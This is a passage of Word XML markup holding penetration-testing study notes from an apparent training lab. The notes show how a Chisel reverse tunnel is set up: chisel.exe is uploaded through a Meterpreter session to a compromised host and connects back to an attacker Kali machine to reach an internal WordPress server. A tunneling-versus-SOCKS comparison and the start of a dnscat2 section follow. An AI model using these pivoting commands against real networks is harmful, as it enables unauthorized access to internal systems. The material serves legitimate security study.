        <w:t xml:space="preserve"> (a type of tunneling. Like regular port forwarding is another type of tunneling).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="498" name="image478.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image478.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="768"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod a+x chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"a" means all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"x" means execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone can execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="768"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 8080 --reverse</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t xml:space="preserve">Then, we'll transfer the extracted </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary to CLIENTWK1 (a compromised system) by using Meterpreter's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1854200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="475" name="image468.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image468.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload chisel.exe C:\\Users\\marcus\\chisel.exe</w:t>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t xml:space="preserve">Now, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and utilize Chisel in client mode to connect back to our Kali machine on port 8080. We'll create a reverse port forward with the syntax </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R:localport:remotehost:remoteport</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In our case, the remote host and port are 172.16.6.241 (target machine in the internal network we want to access port 80 of) and 80. The local port we want to utilize is 80.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1130300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image53.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image53.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId238"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the local IP is implicit here, since we didn't include it, so it defaults to 127.0.0.1. If we wanted explicit, it would be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">single reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not dynamic</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t xml:space="preserve">Once Chisel connects, we can browse to port 80 on 172.16.6.241 via port 80 on our Kali machine (127.0.0.1) by using Firefox:</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="463" name="image451.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image451.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16 shows us a WordPress instance (indicated by the URL and title of the page) on INTERNALSRV1. Let's browse to the dashboard login page for WordPress at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1/wordpress/wp-admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and try to log into it with credentials we've discovered so far.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B08">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we have entered the URL, Firefox displays an error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B09">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The navigation bar in Firefox shows that we were redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internalsrv1.beyond.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can assume that the WordPress instance has the DNS name set as this address instead of the IP address. Because our machine doesn't have information about this DNS name, we cannot connect to the page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B0A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To be able to fully use the web application, we'll add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internalsrv1.beyond.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fwy2qvximtwb" w:id="94"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling vs. SOCKS proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B10">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling (Chisel)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = forward traffic to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific internal services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you want to access a specific internal service (e.g., HTTP on port 80)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a fixed "tunnel" between a local and remote host/port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use case:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use then you want stability or need to browse websites (Chisel is better than proxychains for this)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B17">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy (SOCKS5)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = allow access to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">many services dynamically</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through tools like proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you want to browse or scan multiple internal targets (like with nmap, curl, or Firefox)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Acts like a middleman for any TCP connection, client tells it where to connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to scan or browse around inside the internal network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to run tools like nmap, crackmapexec, or Firefox using proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mig1hqsh0qms" w:id="95"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Tunneling with dnscat2</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
